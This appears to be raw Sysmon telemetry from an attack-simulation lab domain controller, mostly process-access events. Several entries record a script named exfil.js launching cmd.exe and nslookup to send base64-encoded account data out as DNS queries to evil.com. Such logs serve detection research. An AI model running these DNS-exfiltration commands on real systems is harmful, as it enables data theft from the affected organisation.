14:21:45.514{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8F45-000000005F02}7204C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8E45-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-18E0-629A-6742-000000005F02}39765920C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-8E45-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.514{2E1864BB-18F9-629A-8E45-000000005F02}5488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkaahp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000213660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.498{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.498{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.498{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlspuh.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.461{2E1864BB-18F9-629A-8C45-000000005F02}51365352C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8D45-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.461{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8D45-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.445{2E1864BB-18F9-629A-8B45-000000005F02}79004804C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-8D45-000000005F02}6160C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.460{2E1864BB-18F9-629A-8D45-000000005F02}6160C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-8B45-000000005F02}7900C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlspuh.tmp 2>&1 10341000x8000000000000000213649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.430{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8C45-000000005F02}5136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.430{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8C45-000000005F02}5136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.414{2E1864BB-18F9-629A-8C45-000000005F02}51365352C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8B45-000000005F02}7900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.414{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8C45-000000005F02}5136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.398{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.398{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8B45-000000005F02}7900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.398{2E1864BB-18E0-629A-6742-000000005F02}39765064C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-8B45-000000005F02}7900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.402{2E1864BB-18F9-629A-8B45-000000005F02}7900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlspuh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 